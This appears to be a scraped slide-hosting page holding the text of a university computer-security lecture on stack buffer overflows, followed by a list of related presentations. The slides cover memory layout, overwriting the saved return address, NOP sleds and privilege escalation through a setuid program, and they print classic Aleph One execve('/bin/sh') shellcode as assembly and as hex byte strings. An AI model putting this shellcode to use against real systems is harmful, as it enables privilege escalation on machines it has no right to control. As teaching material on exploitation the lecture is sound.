buffer overflows friends cs642 computer security
play

Buffer overflows & friends CS642: Computer Security - PowerPoint PPT Presentation

Aug 11, 2023 •281 likes •640 views

Buffer overflows & friends CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu University of

  1. Buffer ¡overflows ¡& ¡friends ¡ CS642: ¡ ¡ Computer ¡Security ¡ Professor ¡Ristenpart ¡ h9p://www.cs.wisc.edu/~rist/ ¡ rist ¡at ¡cs ¡dot ¡wisc ¡dot ¡edu ¡ University ¡of ¡Wisconsin ¡CS ¡642 ¡

  2. Homework ¡1 ¡will ¡be ¡up ¡tonight ¡ ¡

  3. Low-­‑level ¡soNware ¡security ¡starts ¡with ¡buffer ¡overflows ¡ (Gray ¡Hat ¡Hacking ¡chapter ¡7) ¡ C ¡code, ¡process ¡layout, ¡assembly ¡recall ¡ Buffer ¡overflows ¡on ¡stack ¡ ConstrucSng ¡an ¡exploit ¡buffer ¡ SeWng ¡up ¡exploit ¡code ¡ … ¡ University ¡of ¡Wisconsin ¡CS ¡642 ¡

  4. Running ¡demo ¡example ¡ (from ¡Gray ¡hat ¡hacking ¡w/ ¡modificaSons) ¡

  5. Say ¡this ¡file, ¡meet.c, ¡is ¡compiled ¡setuid ¡ Recall: ¡setuid ¡means ¡it ¡will ¡run ¡as ¡root ¡

  6. (DEMO) ¡

  7. Privilege ¡escalaSon ¡obtained! ¡ Now ¡we’ll ¡see ¡what ¡happened ¡

  8. Process ¡memory ¡layout ¡ unused ¡space ¡ heap ¡ stack ¡ .text ¡ .data ¡ .bss ¡ Env. ¡ Low ¡memory ¡ ¡ High ¡memory ¡ addresses ¡ addresses ¡ .text: ¡ ¡ ¡ ¡ ¡ ¡ heap: ¡ ¡ ¡ ¡ ¡ ¡ ¡machine ¡code ¡of ¡executable ¡ ¡dynamic ¡variables ¡ .data: ¡ stack: ¡ ¡ ¡ ¡ ¡ ¡global ¡iniSalized ¡variables ¡ ¡ ¡ ¡ ¡ ¡local ¡variables, ¡track ¡func ¡calls ¡ .bss: ¡ Env: ¡ ¡ ¡ ¡ ¡ ¡“below ¡stack ¡secSon” ¡ ¡ ¡ ¡ ¡ ¡environment ¡variables, ¡ ¡ ¡ ¡ ¡ ¡global ¡uniniSalized ¡variables ¡ ¡arguments ¡to ¡program ¡

  9. The ¡stack ¡ local ¡ caller ¡ … ¡ EBP ¡ EIP ¡ Param1 ¡ Param2 ¡ var1 ¡ local ¡vars ¡ Low ¡memory ¡ ¡ High ¡memory ¡ addresses ¡ addresses ¡ stack ¡pointer ¡ ¡ stack ¡base ¡pointer ¡ (ESP) ¡ (EBP) ¡

  10. greeSng( ¡int ¡v1 ¡) ¡{ ¡ ¡char ¡name[400]; ¡ } ¡ ¡ int ¡main(int ¡argc, ¡char* ¡argv[]) ¡{ ¡ ¡int ¡p1; ¡ ¡greeSng( ¡p1 ¡); ¡ } ¡

  11. greeSng( ¡int ¡v1 ¡) ¡{ ¡ ¡char ¡name[400]; ¡ } ¡ ¡ int ¡main(int ¡argc, ¡char* ¡argv[]) ¡{ ¡ ¡int ¡p1; ¡ ¡greeSng( ¡p1 ¡); ¡ } ¡

  12. Smashing ¡the ¡stack ¡ caller ¡ name ¡ EBP ¡ name ¡ EIP ¡ temp1 ¡ temp2 ¡ local ¡vars ¡ Low ¡memory ¡ ¡ High ¡memory ¡ addresses ¡ addresses ¡ If ¡temp2 ¡has ¡more ¡than ¡400 ¡bytes… ¡

  13. (DEMO) ¡

  14. Smashing ¡the ¡stack ¡ caller ¡ name ¡ EBP ¡ EIP ¡ temp1 ¡ temp2 ¡ local ¡vars ¡ Low ¡memory ¡ ¡ High ¡memory ¡ addresses ¡ addresses ¡ The ¡key ¡here ¡is ¡EIP ¡ • When ¡greeSng() ¡returns, ¡will ¡jump ¡to ¡address ¡pointed ¡ ¡ ¡to ¡by ¡the ¡EIP ¡value ¡“saved” ¡on ¡stack ¡ • Return ¡address ¡overwri9en ¡when ¡name ¡buffer ¡ ¡ ¡overflows ¡

  15. Smashing ¡the ¡stack ¡ • Useful ¡for ¡denial ¡of ¡service ¡(DoS) ¡ • Be9er ¡yet: ¡control ¡flow ¡hijacking ¡ When ¡greeSng() ¡returns, ¡jumps ¡ to ¡address ¡pointed ¡to ¡by ¡ptr ¡ Have ¡it ¡point ¡back ¡into ¡buffer, ¡ temp2 ¡ ¡ system ¡tries ¡to ¡execute ¡buf ¡as ¡ values ¡ ptr ¡ buffer ¡ machine ¡code ¡ caller ¡ name ¡ EBP ¡ EIP ¡ temp1 ¡ temp2 ¡ local ¡vars ¡ Low ¡memory ¡ ¡ High ¡memory ¡ addresses ¡ addresses ¡

  16. Building ¡an ¡exploit ¡sandwich ¡ • Ingredients: ¡ – executable ¡machine ¡code ¡ – pointer ¡to ¡machine ¡code ¡ machine ¡code ¡ ptr ¡

  17. Building ¡shell ¡code ¡ #include ¡<stdio.h> ¡ movl ¡ ¡ ¡string_addr,string_addr_addr ¡ movb ¡ ¡ ¡$0x0,null_byte_addr ¡ ¡ movl ¡ ¡ ¡$0x0,null_addr ¡ void ¡main() ¡{ ¡ movl ¡ ¡ ¡$0xb,%eax ¡ ¡ ¡ ¡char ¡*name[2]; ¡ movl ¡ ¡ ¡string_addr,%ebx ¡ ¡ leal ¡ ¡ ¡string_addr,%ecx ¡ ¡ ¡ ¡name[0] ¡= ¡"/bin/sh"; ¡ leal ¡ ¡ ¡null_string,%edx ¡ ¡ ¡ ¡name[1] ¡= ¡NULL; ¡ int ¡ ¡ ¡ ¡$0x80 ¡ ¡ ¡ ¡execve(name[0], ¡name, ¡NULL); ¡ movl ¡ ¡ ¡$0x1, ¡%eax ¡ } ¡ movl ¡ ¡ ¡$0x0, ¡%ebx ¡ int ¡ ¡ ¡ ¡$0x80 ¡ /bin/sh ¡string ¡goes ¡here. ¡ Shell ¡code ¡from ¡AlephOne ¡ Problem: ¡we ¡don’t ¡know ¡where ¡we ¡are ¡in ¡memory ¡

  18. Building ¡shell ¡code ¡ jmp ¡ ¡ ¡ ¡offset-­‑to-­‑call ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡2 ¡bytes ¡ popl ¡ ¡ ¡%esi ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡1 ¡byte ¡ movl ¡ ¡ ¡%esi,array-­‑offset(%esi) ¡ ¡ ¡ ¡ ¡ ¡# ¡3 ¡bytes ¡ movb ¡ ¡ ¡$0x0,nullbyteoffset(%esi) ¡# ¡4 ¡bytes ¡ movl ¡ ¡ ¡$0x0,null-­‑offset(%esi) ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡7 ¡bytes ¡ movl ¡ ¡ ¡$0xb,%eax ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡5 ¡bytes ¡ movl ¡ ¡ ¡%esi,%ebx ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡2 ¡bytes ¡ leal ¡ ¡ ¡array-­‑offset,(%esi),%ecx ¡ ¡ ¡ ¡ ¡ ¡# ¡3 ¡bytes ¡ leal ¡ ¡ ¡null-­‑offset(%esi),%edx ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡3 ¡bytes ¡ int ¡ ¡ ¡ ¡$0x80 ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡2 ¡bytes ¡ movl ¡ ¡ ¡$0x1, ¡%eax ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡5 ¡bytes ¡ movl ¡ ¡ ¡$0x0, ¡%ebx ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡5 ¡bytes ¡ int ¡ ¡ ¡ ¡$0x80 ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡2 ¡bytes ¡ call ¡ ¡ ¡offset-­‑to-­‑popl ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡5 ¡bytes ¡ ¡/bin/sh ¡string ¡goes ¡here. ¡ empty ¡bytes ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡# ¡4 ¡bytes ¡ call ¡ “/bin/ address ¡of ¡ more ¡ jmp ¡ empty ¡ ptr ¡ popl ¡ sh” ¡ “/bin/sh” ¡ code ¡

  19. Building ¡shell ¡code ¡ char ¡shellcode[] ¡= ¡ ¡"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" ¡ ¡"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" ¡ ¡"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" ¡ ¡"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; ¡ Another ¡issue: ¡ strcpy ¡stops ¡when ¡it ¡hits ¡a ¡NULL ¡byte ¡ SoluSon: ¡ AlternaSve ¡machine ¡code ¡that ¡avoids ¡NULLs ¡

  20. Building ¡shell ¡code ¡ char ¡shellcode[] ¡= ¡ ¡"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" ¡ ¡"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" ¡ ¡"\x80\xe8\xdc\xff\xff\xff/bin/sh" ¡ Another ¡issue: ¡ strcpy ¡stops ¡when ¡it ¡hits ¡a ¡NULL ¡byte ¡ SoluSon: ¡ Alternate ¡machine ¡code ¡that ¡avoids ¡NULLs ¡ Mason ¡et ¡al., ¡“English ¡Shellcode” ¡ ¡ www.cs.jhu.edu/~sam/ccs243-­‑mason.pdf ¡ ¡

  21. call ¡ “/bin/ address ¡of ¡ more ¡ jmp ¡ empty ¡ ptr ¡ popl ¡ sh” ¡ “/bin/sh” ¡ code ¡ This ¡is ¡a ¡crude ¡way ¡of ¡geWng ¡stack ¡pointer ¡

  22. call ¡ “/bin/ address ¡of ¡ more ¡ jmp ¡ empty ¡ ptr ¡ NOPs ¡ popl ¡ sh” ¡ “/bin/sh” ¡ code ¡ We ¡can ¡use ¡a ¡nop ¡sled ¡to ¡make ¡the ¡arithmeSc ¡easier ¡ InstrucSon ¡“xchg ¡%eax,%eax” ¡which ¡has ¡opcode ¡\x90 ¡ Land ¡anywhere ¡in ¡NOPs, ¡and ¡we ¡are ¡good ¡to ¡go ¡

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Buffer overflows &amp; friends CS642: Computer Security

Buffer overflows &amp; friends CS642: Computer Security

Buffer overflows &amp; friends CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu University of

530 views • 35 slides
Lab 2: Buffer Overflows Fengwei Zhang SUSTech CS 315 Computer Security 1 Buffer Overflows

Lab 2: Buffer Overflows Fengwei Zhang SUSTech CS 315 Computer Security 1 Buffer Overflows

Lab 2: Buffer Overflows Fengwei Zhang SUSTech CS 315 Computer Security 1 Buffer Overflows One of the most common vulnerabilities in software Programming languages commonly associated with buffer overflows including C and C++

1.14k views • 17 slides
Introduction Buffer Overflows Buffer overflows were the most common form of security

Introduction Buffer Overflows Buffer overflows were the most common form of security

Introduction Buffer Overflows Buffer overflows were the most common form of security vulnerability in the 90s. Buffer overflows dominate in the area of remote network penetration vulnerabilities. CS 465 They represent one of the

651 views • 4 slides
Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others prevention techniques known still of major concern

873 views • 53 slides
CSE 484 / CSE M 584 Computer Security: Buffer Overflows

CSE 484 / CSE M 584 Computer Security: Buffer Overflows

CSE 484 / CSE M 584 Computer Security: Buffer Overflows II TA: Viktor Farkas vfarkas@cs Original slides by Franzi Lab 1 Deadline Reminders Lab

373 views • 11 slides
Computer and Information Security Fall 2020 Buffer Overflows and Software Security Tyler Bletsch

Computer and Information Security Fall 2020 Buffer Overflows and Software Security Tyler Bletsch

ECE560 Computer and Information Security Fall 2020 Buffer Overflows and Software Security Tyler Bletsch Duke University What is a Buffer Overflow? Intent Arbitrary code execution Spawn a remote shell or infect with worm/virus

983 views • 75 slides
ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler

ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler

ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler Bletsch Duke University What is a Buffer Overflow? Intent Arbitrary code execution Spawn a remote shell or infect with worm/virus

1.26k views • 76 slides
Computer Security Sec4on Week 2: Buffer Overflows TA:

Computer Security Sec4on Week 2: Buffer Overflows TA:

CSE 484 / CSE M 584 Computer Security Sec4on Week 2: Buffer Overflows TA: Thomas Crosley tcrosley@cs Thanks to Franzi Roesner, Adrian

502 views • 14 slides
Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer

Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer

Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer Science Rutgers University http://www.cs.rutgers.edu/~vinodg/416 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red,

950 views • 55 slides
Lab 2: Buffer Overflows Fengwei Zhang Wayne State University Course: Cyber Security Prac@ce 1

Lab 2: Buffer Overflows Fengwei Zhang Wayne State University Course: Cyber Security Prac@ce 1

Lab 2: Buffer Overflows Fengwei Zhang Wayne State University Course: Cyber Security Prac@ce 1 Buffer Overflows One of the most common vulnerabili@es in soEware Programming languages commonly associated with buffer overflows including

199 views • 17 slides
Computer Security Buffer Overflows Denial of Service MIE456 Joseph Kong Overview Program

Computer Security Buffer Overflows Denial of Service MIE456 Joseph Kong Overview Program

Computer Security Buffer Overflows Denial of Service MIE456 Joseph Kong Overview Program Exploitation Buffer Overflows Memory Declaration Smashing The Stack TCP/IP Three Way Handshake Denial of Service SYN Flooding

403 views • 13 slides
Lab 2: Buffer Overflows Fengwei Zhang Wayne State University CSC 5991 Cyber Security PracCce 1

Lab 2: Buffer Overflows Fengwei Zhang Wayne State University CSC 5991 Cyber Security PracCce 1

Lab 2: Buffer Overflows Fengwei Zhang Wayne State University CSC 5991 Cyber Security PracCce 1 Buffer Overflows One of the most common vulnerabiliCes in soGware Programming languages commonly associated with buffer overflows including

195 views • 17 slides
Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Last time We continued By launching our 1st section: Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow fundamentals This time We will finish up By looking at Buffer Overflow overflows

1.33k views • 103 slides
Software In-Security Buffer overflows Overview Web Application security Malware OS

Software In-Security Buffer overflows Overview Web Application security Malware OS

Lecture overview Table of contents: Introduction to SW security Software In-Security Buffer overflows Overview Web Application security Malware OS security topics Code scanning Emmanuel Benoist Taught by Ulrich

479 views • 13 slides
ASLR &amp; DEP DAVID HEAVERN Problem Statement Security Issues Buffer Overflows

ASLR &amp; DEP DAVID HEAVERN Problem Statement Security Issues Buffer Overflows

ASLR &amp; DEP DAVID HEAVERN Problem Statement Security Issues Buffer Overflows Buffer overflows are the source of many of the common vulnerabilities in modern software Caused by not checking the source length when writing to a

1.88k views • 130 slides
Buffer Software Security overflows and other memory safety vulnerabilities History

Buffer Software Security overflows and other memory safety vulnerabilities History

This time We will begin By investigating our 1st section: Buffer Software Security overflows and other memory safety vulnerabilities History Memory layouts Buffer overflow fundamentals Analyzing security Security

1.41k views • 107 slides
Secure Programming Laboratory 1: Introduction SP Demonstrators: Arthur Chan / David Aspinall 4th

Secure Programming Laboratory 1: Introduction SP Demonstrators: Arthur Chan / David Aspinall 4th

Secure Programming Laboratory 1: Introduction SP Demonstrators: Arthur Chan / David Aspinall 4th October 2019 Orientation This is the first Laboratory Session for Secure Programming It is convened by Arthur and David. The handout and other

570 views • 11 slides
Configuring bash to your liking During your time in CS, youll be spending a lot of time

Configuring bash to your liking During your time in CS, youll be spending a lot of time

Configuring bash to your liking During your time in CS, youll be spending a lot of time working in/with bash, it helps to configure it to your liking There are a number of bash (and other) config files in your home directory, including

98 views • 9 slides
COMP 2718: The Environment By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne Outline

COMP 2718: The Environment By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne Outline

COMP 2718: The Environment By: Dr. Andrew Vardy Adapted from the notes of Dr. Rod Byrne Outline The Environment Chapter 11 of TLCL What is the Environment? Examining the Environment Some Interesting Variables How is the

513 views • 15 slides
Managing Cray XT MPI Runtime Environment Variables to Optimize and Scale Applications Geir

Managing Cray XT MPI Runtime Environment Variables to Optimize and Scale Applications Geir

Managing Cray XT MPI Runtime Environment Variables to Optimize and Scale Applications Geir Johansen May 5, 2008 Cray Inc. Proprietary Slide 1 Goals of the Presentation Provide users an overview of the implementation of MPI on the Cray XT.

790 views • 44 slides
Docker Review Basic Commands docker image ls # list images currently present locally docker

Docker Review Basic Commands docker image ls # list images currently present locally docker

Docker Review Basic Commands docker image ls # list images currently present locally docker container ls # list running containers docker run &lt;image_name&gt; # run an image as a container docker exec &lt;container&gt; &lt;command&gt; # run a

1.1k views • 6 slides
Fr Free variables Variables used but not bound within function

Fr Free variables Variables used but not bound within function

9/18/15 Fr Free variables Variables used but not bound within function bodies. (define x 1) ( define f ( lambda (y) (+ x y))) ( define z ( let ([x 2] x is a free variable in [y

310 views • 6 slides
tr tr

tr tr

tr tr tts st t sts tr

519 views • 7 slides
Introduction digitalocean.com What does DO do? Simple, Developer-focused Cloud Hosting

Introduction digitalocean.com What does DO do? Simple, Developer-focused Cloud Hosting

Introduction digitalocean.com What does DO do? Simple, Developer-focused Cloud Hosting digitalocean.com What are we using Ansible for? digitalocean.com Example Deployment digitalocean.com Example Project Layout digitalocean.com Project

1.02k views • 74 slides

More recommend